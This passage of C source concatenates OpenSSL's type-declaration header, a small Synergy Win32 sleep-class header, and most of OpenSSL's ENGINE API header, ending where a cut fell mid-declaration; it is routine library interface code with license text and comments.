/* ==================================================================== * Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * openssl-core@openssl.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.openssl.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ #ifndef HEADER_OPENSSL_TYPES_H #define HEADER_OPENSSL_TYPES_H #include <openssl/e_os2.h> #ifdef NO_ASN1_TYPEDEFS #define ASN1_INTEGER ASN1_STRING #define ASN1_ENUMERATED ASN1_STRING #define ASN1_BIT_STRING ASN1_STRING #define ASN1_OCTET_STRING ASN1_STRING #define ASN1_PRINTABLESTRING ASN1_STRING #define ASN1_T61STRING ASN1_STRING #define ASN1_IA5STRING ASN1_STRING #define ASN1_UTCTIME ASN1_STRING #define ASN1_GENERALIZEDTIME ASN1_STRING #define ASN1_TIME ASN1_STRING #define ASN1_GENERALSTRING ASN1_STRING #define ASN1_UNIVERSALSTRING ASN1_STRING #define ASN1_BMPSTRING ASN1_STRING #define ASN1_VISIBLESTRING ASN1_STRING #define ASN1_UTF8STRING ASN1_STRING #define ASN1_BOOLEAN int #define ASN1_NULL int #else typedef struct asn1_string_st ASN1_INTEGER; typedef struct asn1_string_st ASN1_ENUMERATED; typedef struct asn1_string_st ASN1_BIT_STRING; typedef struct asn1_string_st ASN1_OCTET_STRING; typedef struct asn1_string_st ASN1_PRINTABLESTRING; typedef struct asn1_string_st ASN1_T61STRING; typedef struct asn1_string_st ASN1_IA5STRING; typedef struct asn1_string_st ASN1_GENERALSTRING; typedef struct asn1_string_st ASN1_UNIVERSALSTRING; typedef struct asn1_string_st ASN1_BMPSTRING; typedef struct 
asn1_string_st ASN1_UTCTIME;
typedef struct asn1_string_st ASN1_TIME;
typedef struct asn1_string_st ASN1_GENERALIZEDTIME;
typedef struct asn1_string_st ASN1_VISIBLESTRING;
typedef struct asn1_string_st ASN1_UTF8STRING;
typedef int ASN1_BOOLEAN;
typedef int ASN1_NULL;
#endif

typedef struct asn1_pctx_st ASN1_PCTX;

#ifdef OPENSSL_SYS_WIN32
/* These clash with identically named symbols in the Windows SDK */
#undef X509_NAME
#undef X509_EXTENSIONS
#undef X509_CERT_PAIR
#undef PKCS7_ISSUER_AND_SERIAL
#undef OCSP_REQUEST
#undef OCSP_RESPONSE
#endif

#ifdef BIGNUM
#undef BIGNUM
#endif
/* Opaque forward typedefs for the big-number (BN) library */
typedef struct bignum_st BIGNUM;
typedef struct bignum_ctx BN_CTX;
typedef struct bn_blinding_st BN_BLINDING;
typedef struct bn_mont_ctx_st BN_MONT_CTX;
typedef struct bn_recp_ctx_st BN_RECP_CTX;
typedef struct bn_gencb_st BN_GENCB;

typedef struct buf_mem_st BUF_MEM;

/* EVP (high-level crypto) types */
typedef struct evp_cipher_st EVP_CIPHER;
typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX;
typedef struct env_md_st EVP_MD;
typedef struct env_md_ctx_st EVP_MD_CTX;
typedef struct evp_pkey_st EVP_PKEY;
typedef struct evp_pkey_asn1_method_st EVP_PKEY_ASN1_METHOD;
typedef struct evp_pkey_method_st EVP_PKEY_METHOD;
typedef struct evp_pkey_ctx_st EVP_PKEY_CTX;

/* Public-key algorithm implementations and their method tables */
typedef struct dh_st DH;
typedef struct dh_method DH_METHOD;

typedef struct dsa_st DSA;
typedef struct dsa_method DSA_METHOD;

typedef struct rsa_st RSA;
typedef struct rsa_meth_st RSA_METHOD;

typedef struct rand_meth_st RAND_METHOD;

typedef struct ecdh_method ECDH_METHOD;
typedef struct ecdsa_method ECDSA_METHOD;

/* X.509 certificate handling */
typedef struct x509_st X509;
typedef struct X509_algor_st X509_ALGOR;
typedef struct X509_crl_st X509_CRL;
typedef struct x509_crl_method_st X509_CRL_METHOD;
typedef struct x509_revoked_st X509_REVOKED;
typedef struct X509_name_st X509_NAME;
typedef struct X509_pubkey_st X509_PUBKEY;
typedef struct x509_store_st X509_STORE;
typedef struct x509_store_ctx_st X509_STORE_CTX;

typedef struct pkcs8_priv_key_info_st PKCS8_PRIV_KEY_INFO;

typedef struct v3_ext_ctx X509V3_CTX;
typedef struct conf_st CONF;

typedef struct store_st STORE;
typedef struct store_method_st STORE_METHOD;

typedef struct ui_st UI;
typedef struct ui_method_st UI_METHOD;

typedef struct st_ERR_FNS ERR_FNS;

typedef struct engine_st ENGINE;

typedef struct ssl_st SSL;
typedef struct ssl_ctx_st SSL_CTX;

/* Certificate-policy tree checking */
typedef struct X509_POLICY_NODE_st X509_POLICY_NODE;
typedef struct X509_POLICY_LEVEL_st X509_POLICY_LEVEL;
typedef struct X509_POLICY_TREE_st X509_POLICY_TREE;
typedef struct X509_POLICY_CACHE_st X509_POLICY_CACHE;

typedef struct AUTHORITY_KEYID_st AUTHORITY_KEYID;
typedef struct DIST_POINT_st DIST_POINT;
typedef struct ISSUING_DIST_POINT_st ISSUING_DIST_POINT;
typedef struct NAME_CONSTRAINTS_st NAME_CONSTRAINTS;

/* If placed in pkcs12.h, we end up with a circular dependency with pkcs7.h */
#define DECLARE_PKCS12_STACK_OF(type) /* Nothing */
#define IMPLEMENT_PKCS12_STACK_OF(type) /* Nothing */

typedef struct crypto_ex_data_st CRYPTO_EX_DATA;
/* Callback types for crypto.h */
typedef int CRYPTO_EX_new(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
					int idx, long argl, void *argp);
typedef void CRYPTO_EX_free(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
					int idx, long argl, void *argp);
typedef int CRYPTO_EX_dup(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from, void *from_d,
					int idx, long argl, void *argp);

typedef struct ocsp_req_ctx_st OCSP_REQ_CTX;
typedef struct ocsp_response_st OCSP_RESPONSE;
typedef struct ocsp_responder_id_st OCSP_RESPID;

#endif /* def HEADER_OPENSSL_TYPES_H */
{ "language": "C" }
/* * synergy -- mouse and keyboard sharing utility * Copyright (C) 2012-2016 Symless Ltd. * Copyright (C) 2002 Chris Schoeneman * * This package is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * found in the file LICENSE that should have accompanied this file. * * This package is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ #pragma once #include "arch/IArchSleep.h" #define ARCH_SLEEP ArchSleepWindows //! Win32 implementation of IArchSleep class ArchSleepWindows : public IArchSleep { public: ArchSleepWindows(); virtual ~ArchSleepWindows(); // IArchSleep overrides virtual void sleep(double timeout); };
{ "language": "C" }
/* openssl/engine.h */ /* * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project * 2000. */ /* ==================================================================== * Copyright (c) 1999-2004 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* ==================================================================== * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED. * ECDH support in OpenSSL originally developed by * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project. */ #ifndef HEADER_ENGINE_H # define HEADER_ENGINE_H # include <openssl/opensslconf.h> # ifdef OPENSSL_NO_ENGINE # error ENGINE is disabled. # endif # ifndef OPENSSL_NO_DEPRECATED # include <openssl/bn.h> # ifndef OPENSSL_NO_RSA # include <openssl/rsa.h> # endif # ifndef OPENSSL_NO_DSA # include <openssl/dsa.h> # endif # ifndef OPENSSL_NO_DH # include <openssl/dh.h> # endif # ifndef OPENSSL_NO_ECDH # include <openssl/ecdh.h> # endif # ifndef OPENSSL_NO_ECDSA # include <openssl/ecdsa.h> # endif # include <openssl/rand.h> # include <openssl/ui.h> # include <openssl/err.h> # endif # include <openssl/ossl_typ.h> # include <openssl/symhacks.h> # include <openssl/x509.h> #ifdef __cplusplus extern "C" { #endif /* * These flags are used to control combinations of algorithm (methods) by * bitwise "OR"ing. 
*/ # define ENGINE_METHOD_RSA (unsigned int)0x0001 # define ENGINE_METHOD_DSA (unsigned int)0x0002 # define ENGINE_METHOD_DH (unsigned int)0x0004 # define ENGINE_METHOD_RAND (unsigned int)0x0008 # define ENGINE_METHOD_ECDH (unsigned int)0x0010 # define ENGINE_METHOD_ECDSA (unsigned int)0x0020 # define ENGINE_METHOD_CIPHERS (unsigned int)0x0040 # define ENGINE_METHOD_DIGESTS (unsigned int)0x0080 # define ENGINE_METHOD_STORE (unsigned int)0x0100 # define ENGINE_METHOD_PKEY_METHS (unsigned int)0x0200 # define ENGINE_METHOD_PKEY_ASN1_METHS (unsigned int)0x0400 /* Obvious all-or-nothing cases. */ # define ENGINE_METHOD_ALL (unsigned int)0xFFFF # define ENGINE_METHOD_NONE (unsigned int)0x0000 /* * This(ese) flag(s) controls behaviour of the ENGINE_TABLE mechanism used * internally to control registration of ENGINE implementations, and can be * set by ENGINE_set_table_flags(). The "NOINIT" flag prevents attempts to * initialise registered ENGINEs if they are not already initialised. */ # define ENGINE_TABLE_FLAG_NOINIT (unsigned int)0x0001 /* ENGINE flags that can be set by ENGINE_set_flags(). */ /* Not used */ /* #define ENGINE_FLAGS_MALLOCED 0x0001 */ /* * This flag is for ENGINEs that wish to handle the various 'CMD'-related * control commands on their own. Without this flag, ENGINE_ctrl() handles * these control commands on behalf of the ENGINE using their "cmd_defns" * data. */ # define ENGINE_FLAGS_MANUAL_CMD_CTRL (int)0x0002 /* * This flag is for ENGINEs who return new duplicate structures when found * via "ENGINE_by_id()". When an ENGINE must store state (eg. if * ENGINE_ctrl() commands are called in sequence as part of some stateful * process like key-generation setup and execution), it can set this flag - * then each attempt to obtain the ENGINE will result in it being copied into * a new structure. Normally, ENGINEs don't declare this flag so * ENGINE_by_id() just increments the existing ENGINE's structural reference * count. 
*/ # define ENGINE_FLAGS_BY_ID_COPY (int)0x0004 /* * This flag if for an ENGINE that does not want its methods registered as * part of ENGINE_register_all_complete() for example if the methods are not * usable as default methods. */ # define ENGINE_FLAGS_NO_REGISTER_ALL (int)0x0008 /* * ENGINEs can support their own command types, and these flags are used in * ENGINE_CTRL_GET_CMD_FLAGS to indicate to the caller what kind of input * each command expects. Currently only numeric and string input is * supported. If a control command supports none of the _NUMERIC, _STRING, or * _NO_INPUT options, then it is regarded as an "internal" control command - * and not for use in config setting situations. As such, they're not * available to the ENGINE_ctrl_cmd_string() function, only raw ENGINE_ctrl() * access. Changes to this list of 'command types' should be reflected * carefully in ENGINE_cmd_is_executable() and ENGINE_ctrl_cmd_string(). */ /* accepts a 'long' input value (3rd parameter to ENGINE_ctrl) */ # define ENGINE_CMD_FLAG_NUMERIC (unsigned int)0x0001 /* * accepts string input (cast from 'void*' to 'const char *', 4th parameter * to ENGINE_ctrl) */ # define ENGINE_CMD_FLAG_STRING (unsigned int)0x0002 /* * Indicates that the control command takes *no* input. Ie. the control * command is unparameterised. */ # define ENGINE_CMD_FLAG_NO_INPUT (unsigned int)0x0004 /* * Indicates that the control command is internal. This control command won't * be shown in any output, and is only usable through the ENGINE_ctrl_cmd() * function. */ # define ENGINE_CMD_FLAG_INTERNAL (unsigned int)0x0008 /* * NB: These 3 control commands are deprecated and should not be used. * ENGINEs relying on these commands should compile conditional support for * compatibility (eg. if these symbols are defined) but should also migrate * the same functionality to their own ENGINE-specific control functions that * can be "discovered" by calling applications. 
The fact these control * commands wouldn't be "executable" (ie. usable by text-based config) * doesn't change the fact that application code can find and use them * without requiring per-ENGINE hacking. */ /* * These flags are used to tell the ctrl function what should be done. All * command numbers are shared between all engines, even if some don't make * sense to some engines. In such a case, they do nothing but return the * error ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED. */ # define ENGINE_CTRL_SET_LOGSTREAM 1 # define ENGINE_CTRL_SET_PASSWORD_CALLBACK 2 # define ENGINE_CTRL_HUP 3/* Close and reinitialise * any handles/connections * etc. */ # define ENGINE_CTRL_SET_USER_INTERFACE 4/* Alternative to callback */ # define ENGINE_CTRL_SET_CALLBACK_DATA 5/* User-specific data, used * when calling the password * callback and the user * interface */ # define ENGINE_CTRL_LOAD_CONFIGURATION 6/* Load a configuration, * given a string that * represents a file name * or so */ # define ENGINE_CTRL_LOAD_SECTION 7/* Load data from a given * section in the already * loaded configuration */ /* * These control commands allow an application to deal with an arbitrary * engine in a dynamic way. Warn: Negative return values indicate errors FOR * THESE COMMANDS because zero is used to indicate 'end-of-list'. Other * commands, including ENGINE-specific command types, return zero for an * error. An ENGINE can choose to implement these ctrl functions, and can * internally manage things however it chooses - it does so by setting the * ENGINE_FLAGS_MANUAL_CMD_CTRL flag (using ENGINE_set_flags()). Otherwise * the ENGINE_ctrl() code handles this on the ENGINE's behalf using the * cmd_defns data (set using ENGINE_set_cmd_defns()). This means an ENGINE's * ctrl() handler need only implement its own commands - the above "meta" * commands will be taken care of. */ /* * Returns non-zero if the supplied ENGINE has a ctrl() handler. 
If "not", * then all the remaining control commands will return failure, so it is * worth checking this first if the caller is trying to "discover" the * engine's capabilities and doesn't want errors generated unnecessarily. */ # define ENGINE_CTRL_HAS_CTRL_FUNCTION 10 /* * Returns a positive command number for the first command supported by the * engine. Returns zero if no ctrl commands are supported. */ # define ENGINE_CTRL_GET_FIRST_CMD_TYPE 11 /* * The 'long' argument specifies a command implemented by the engine, and the * return value is the next command supported, or zero if there are no more. */ # define ENGINE_CTRL_GET_NEXT_CMD_TYPE 12 /* * The 'void*' argument is a command name (cast from 'const char *'), and the * return value is the command that corresponds to it. */ # define ENGINE_CTRL_GET_CMD_FROM_NAME 13 /* * The next two allow a command to be converted into its corresponding string * form. In each case, the 'long' argument supplies the command. In the * NAME_LEN case, the return value is the length of the command name (not * counting a trailing EOL). In the NAME case, the 'void*' argument must be a * string buffer large enough, and it will be populated with the name of the * command (WITH a trailing EOL). */ # define ENGINE_CTRL_GET_NAME_LEN_FROM_CMD 14 # define ENGINE_CTRL_GET_NAME_FROM_CMD 15 /* The next two are similar but give a "short description" of a command. */ # define ENGINE_CTRL_GET_DESC_LEN_FROM_CMD 16 # define ENGINE_CTRL_GET_DESC_FROM_CMD 17 /* * With this command, the return value is the OR'd combination of * ENGINE_CMD_FLAG_*** values that indicate what kind of input a given * engine-specific ctrl command expects. */ # define ENGINE_CTRL_GET_CMD_FLAGS 18 /* * ENGINE implementations should start the numbering of their own control * commands from this value. (ie. ENGINE_CMD_BASE, ENGINE_CMD_BASE + 1, etc). 
*/ # define ENGINE_CMD_BASE 200 /* * NB: These 2 nCipher "chil" control commands are deprecated, and their * functionality is now available through ENGINE-specific control commands * (exposed through the above-mentioned 'CMD'-handling). Code using these 2 * commands should be migrated to the more general command handling before * these are removed. */ /* Flags specific to the nCipher "chil" engine */ # define ENGINE_CTRL_CHIL_SET_FORKCHECK 100 /* * Depending on the value of the (long)i argument, this sets or * unsets the SimpleForkCheck flag in the CHIL API to enable or * disable checking and workarounds for applications that fork(). */ # define ENGINE_CTRL_CHIL_NO_LOCKING 101 /* * This prevents the initialisation function from providing mutex * callbacks to the nCipher library. */ /* * If an ENGINE supports its own specific control commands and wishes the * framework to handle the above 'ENGINE_CMD_***'-manipulation commands on * its behalf, it should supply a null-terminated array of ENGINE_CMD_DEFN * entries to ENGINE_set_cmd_defns(). It should also implement a ctrl() * handler that supports the stated commands (ie. the "cmd_num" entries as * described by the array). NB: The array must be ordered in increasing order * of cmd_num. "null-terminated" means that the last ENGINE_CMD_DEFN element * has cmd_num set to zero and/or cmd_name set to NULL. 
 */
/*
 * Describes one ENGINE-specific control command. A NUL-terminated array of
 * these (see ENGINE_set_cmd_defns()) lets the generic ENGINE_ctrl() code
 * handle the 'CMD'-discovery meta-commands on the ENGINE's behalf.
 */
typedef struct ENGINE_CMD_DEFN_st {
    unsigned int cmd_num;       /* The command number */
    const char *cmd_name;       /* The command name itself */
    const char *cmd_desc;       /* A short description of the command */
    unsigned int cmd_flags;     /* The input the command expects */
} ENGINE_CMD_DEFN;
/* Generic function pointer */
typedef int (*ENGINE_GEN_FUNC_PTR) (void);
/* Generic function pointer taking an ENGINE argument (init/finish/destroy) */
typedef int (*ENGINE_GEN_INT_FUNC_PTR) (ENGINE *);
/* Specific control function pointer */
typedef int (*ENGINE_CTRL_FUNC_PTR) (ENGINE *, int, long, void *,
                                     void (*f) (void));
/* Generic load_key function pointer */
typedef EVP_PKEY *(*ENGINE_LOAD_KEY_PTR)(ENGINE *, const char *,
                                         UI_METHOD *ui_method,
                                         void *callback_data);
/* Handler type used for selecting an SSL client certificate and key */
typedef int (*ENGINE_SSL_CLIENT_CERT_PTR) (ENGINE *, SSL *ssl,
                                           STACK_OF(X509_NAME) *ca_dn,
                                           X509 **pcert, EVP_PKEY **pkey,
                                           STACK_OF(X509) **pother,
                                           UI_METHOD *ui_method,
                                           void *callback_data);
/*-
 * These callback types are for an ENGINE's handler for cipher and digest logic.
 * These handlers have these prototypes;
 *   int foo(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid);
 *   int foo(ENGINE *e, const EVP_MD **digest, const int **nids, int nid);
 * Looking at how to implement these handlers in the case of cipher support, if
 * the framework wants the EVP_CIPHER for 'nid', it will call;
 *   foo(e, &p_evp_cipher, NULL, nid);    (return zero for failure)
 * If the framework wants a list of supported 'nid's, it will call;
 *   foo(e, NULL, &p_nids, 0); (returns number of 'nids' or -1 for error)
 */
/*
 * Returns a pointer to the array of supported cipher 'nid's. If the
 * second parameter is non-NULL it is set to the size of the returned array.
*/ typedef int (*ENGINE_CIPHERS_PTR) (ENGINE *, const EVP_CIPHER **, const int **, int); typedef int (*ENGINE_DIGESTS_PTR) (ENGINE *, const EVP_MD **, const int **, int); typedef int (*ENGINE_PKEY_METHS_PTR) (ENGINE *, EVP_PKEY_METHOD **, const int **, int); typedef int (*ENGINE_PKEY_ASN1_METHS_PTR) (ENGINE *, EVP_PKEY_ASN1_METHOD **, const int **, int); /* * STRUCTURE functions ... all of these functions deal with pointers to * ENGINE structures where the pointers have a "structural reference". This * means that their reference is to allowed access to the structure but it * does not imply that the structure is functional. To simply increment or * decrement the structural reference count, use ENGINE_by_id and * ENGINE_free. NB: This is not required when iterating using ENGINE_get_next * as it will automatically decrement the structural reference count of the * "current" ENGINE and increment the structural reference count of the * ENGINE it returns (unless it is NULL). */ /* Get the first/last "ENGINE" type available. */ ENGINE *ENGINE_get_first(void); ENGINE *ENGINE_get_last(void); /* Iterate to the next/previous "ENGINE" type (NULL = end of the list). */ ENGINE *ENGINE_get_next(ENGINE *e); ENGINE *ENGINE_get_prev(ENGINE *e); /* Add another "ENGINE" type into the array. */ int ENGINE_add(ENGINE *e); /* Remove an existing "ENGINE" type from the array. */ int ENGINE_remove(ENGINE *e); /* Retrieve an engine from the list by its unique "id" value. */ ENGINE *ENGINE_by_id(const char *id); /* Add all the built-in engines. 
*/ void ENGINE_load_openssl(void); void ENGINE_load_dynamic(void); # ifndef OPENSSL_NO_STATIC_ENGINE void ENGINE_load_4758cca(void); void ENGINE_load_aep(void); void ENGINE_load_atalla(void); void ENGINE_load_chil(void); void ENGINE_load_cswift(void); void ENGINE_load_nuron(void); void ENGINE_load_sureware(void); void ENGINE_load_ubsec(void); void ENGINE_load_padlock(void); void ENGINE_load_capi(void); # ifndef OPENSSL_NO_GMP void ENGINE_load_gmp(void); # endif # ifndef OPENSSL_NO_GOST void ENGINE_load_gost(void); # endif # endif void ENGINE_load_cryptodev(void); void ENGINE_load_rdrand(void); void ENGINE_load_builtin_engines(void); /* * Get and set global flags (ENGINE_TABLE_FLAG_***) for the implementation * "registry" handling. */ unsigned int ENGINE_get_table_flags(void); void ENGINE_set_table_flags(unsigned int flags); /*- Manage registration of ENGINEs per "table". For each type, there are 3 * functions; * ENGINE_register_***(e) - registers the implementation from 'e' (if it has one) * ENGINE_unregister_***(e) - unregister the implementation from 'e' * ENGINE_register_all_***() - call ENGINE_register_***() for each 'e' in the list * Cleanup is automatically registered from each table when required, so * ENGINE_cleanup() will reverse any "register" operations. 
*/ int ENGINE_register_RSA(ENGINE *e); void ENGINE_unregister_RSA(ENGINE *e); void ENGINE_register_all_RSA(void); int ENGINE_register_DSA(ENGINE *e); void ENGINE_unregister_DSA(ENGINE *e); void ENGINE_register_all_DSA(void); int ENGINE_register_ECDH(ENGINE *e); void ENGINE_unregister_ECDH(ENGINE *e); void ENGINE_register_all_ECDH(void); int ENGINE_register_ECDSA(ENGINE *e); void ENGINE_unregister_ECDSA(ENGINE *e); void ENGINE_register_all_ECDSA(void); int ENGINE_register_DH(ENGINE *e); void ENGINE_unregister_DH(ENGINE *e); void ENGINE_register_all_DH(void); int ENGINE_register_RAND(ENGINE *e); void ENGINE_unregister_RAND(ENGINE *e); void ENGINE_register_all_RAND(void); int ENGINE_register_STORE(ENGINE *e); void ENGINE_unregister_STORE(ENGINE *e); void ENGINE_register_all_STORE(void); int ENGINE_register_ciphers(ENGINE *e); void ENGINE_unregister_ciphers(ENGINE *e); void ENGINE_register_all_ciphers(void); int ENGINE_register_digests(ENGINE *e); void ENGINE_unregister_digests(ENGINE *e); void ENGINE_register_all_digests(void); int ENGINE_register_pkey_meths(ENGINE *e); void ENGINE_unregister_pkey_meths(ENGINE *e); void ENGINE_register_all_pkey_meths(void); int ENGINE_register_pkey_asn1_meths(ENGINE *e); void ENGINE_unregister_pkey_asn1_meths(ENGINE *e); void ENGINE_register_all_pkey_asn1_meths(void); /* * These functions register all support from the above categories. Note, use * of these functions can result in static linkage of code your application * may not need. If you only need a subset of functionality, consider using * more selective initialisation. */ int ENGINE_register_complete(ENGINE *e); int ENGINE_register_all_complete(void); /* * Send parametrised control commands to the engine. The possibilities to * send down an integer, a pointer to data or a function pointer are * provided. Any of the parameters may or may not be NULL, depending on the * command number. 
In actuality, this function only requires a structural * (rather than functional) reference to an engine, but many control commands * may require the engine be functional. The caller should be aware of trying * commands that require an operational ENGINE, and only use functional * references in such situations. */ int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void)); /* * This function tests if an ENGINE-specific command is usable as a * "setting". Eg. in an application's config file that gets processed through * ENGINE_ctrl_cmd_string(). If this returns zero, it is not available to * ENGINE_ctrl_cmd_string(), only ENGINE_ctrl(). */ int ENGINE_cmd_is_executable(ENGINE *e, int cmd); /* * This function works like ENGINE_ctrl() with the exception of taking a * command name instead of a command number, and can handle optional * commands. See the comment on ENGINE_ctrl_cmd_string() for an explanation * on how to use the cmd_name and cmd_optional. */ int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name, long i, void *p, void (*f) (void), int cmd_optional); /* * This function passes a command-name and argument to an ENGINE. The * cmd_name is converted to a command number and the control command is * called using 'arg' as an argument (unless the ENGINE doesn't support such * a command, in which case no control command is called). The command is * checked for input flags, and if necessary the argument will be converted * to a numeric value. If cmd_optional is non-zero, then if the ENGINE * doesn't support the given cmd_name the return value will be success * anyway. This function is intended for applications to use so that users * (or config files) can supply engine-specific config data to the ENGINE at * run-time to control behaviour of specific engines. 
As such, it shouldn't * be used for calling ENGINE_ctrl() functions that return data, deal with * binary data, or that are otherwise supposed to be used directly through * ENGINE_ctrl() in application code. Any "return" data from an ENGINE_ctrl() * operation in this function will be lost - the return value is interpreted * as failure if the return value is zero, success otherwise, and this * function returns a boolean value as a result. In other words, vendors of * 'ENGINE'-enabled devices should write ENGINE implementations with * parameterisations that work in this scheme, so that compliant ENGINE-based * applications can work consistently with the same configuration for the * same ENGINE-enabled devices, across applications. */ int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg, int cmd_optional); /* * These functions are useful for manufacturing new ENGINE structures. They * don't address reference counting at all - one uses them to populate an * ENGINE structure with personalised implementations of things prior to * using it directly or adding it to the builtin ENGINE list in OpenSSL. * These are also here so that the ENGINE structure doesn't have to be * exposed and break binary compatibility! 
*/ ENGINE *ENGINE_new(void); int ENGINE_free(ENGINE *e); int ENGINE_up_ref(ENGINE *e); int ENGINE_set_id(ENGINE *e, const char *id); int ENGINE_set_name(ENGINE *e, const char *name); int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth); int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth); int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *ecdh_meth); int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *ecdsa_meth); int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth); int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth); int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *store_meth); int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f); int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f); int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f); int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f); int ENGINE_set_load_privkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpriv_f); int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f); int ENGINE_set_load_ssl_client_cert_function(ENGINE *e, ENGINE_SSL_CLIENT_CERT_PTR loadssl_f); int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f); int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f); int ENGINE_set_pkey_meths(ENGINE *e, ENGINE_PKEY_METHS_PTR f); int ENGINE_set_pkey_asn1_meths(ENGINE *e, ENGINE_PKEY_ASN1_METHS_PTR f); int ENGINE_set_flags(ENGINE *e, int flags); int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns); /* These functions allow control over any per-structure ENGINE data. */ int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func, 